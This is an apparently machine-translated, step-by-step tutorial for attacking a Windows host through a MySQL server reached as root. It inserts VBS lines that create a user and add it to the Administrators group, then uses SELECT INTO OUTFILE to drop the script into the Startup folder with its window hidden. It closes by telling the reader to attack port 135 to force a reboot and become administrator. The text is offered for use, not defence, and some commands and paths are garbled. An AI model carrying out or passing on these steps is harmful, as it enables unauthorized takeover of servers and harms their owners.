Mysql| attack 1, connect to each other MySQL server
Mysql-u root-h 192.168.0.1
Mysql.exe This program is in the bin directory where you have MySQL installed
2. Let's take a look at some of the databases in the server
Mysql>show databases;
MySQL default installation will have MySQL, test these two databases, if you see that there are other databases that is the user-built database.
3, let us enter the database
Mysql>use test;
We're going to go into the test database.
4. See what data tables we get into the database
Mysql>show tables;
By default, no table exists in test.
The following are the key parts
5. Create a new table under test database;
Mysql>create Table A (cmd text);
Well, we created a new table named A, which only holds one field in the table, the field name is cmd, and the text.
6, insert the content in the table
Mysql>insert into a values ("Set Wshshell=createobject (" "Wscript.Shell") ");
Mysql>insert into a values ("A=wshshell.run (" "cmd.exe/c net User 1 1/add" ", 0)");
Mysql>insert into a values ("B=wshshell.run (" "Cmd.exe/c net localgroup Administrators 1/add" ", 0)");
Note the double quotes and parentheses and the "0" in the back must be entered! We will use these three commands to create a VBS script!
7, okay, now let's see what's in Table A.
Mysql>select * from A;
We will see that there are three rows of data in the table, that is, what we just typed, confirm what you typed, and we'll come to the next step.
8, the output table is a VBS script file
Mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\" start "menu \ \ program \ Start \\a.vbs";
We entered the contents of our table into the Startup group, is a script file of VBS! Note the "\" symbol.
9, see this everyone must know, is the use of MySQL output an executable file. Why not bat, because the start of the runtime will have a clear DOS window out, and the VBS script can completely hide the window without error prompts! Originally, there should be a sentence after the completion of the script automatically deleted this script, but the Chinese directory is really unable to deal with, only to forget! All right, find a tool to attack 135 and let the server reboot, and in a few minutes you'll be the administrator.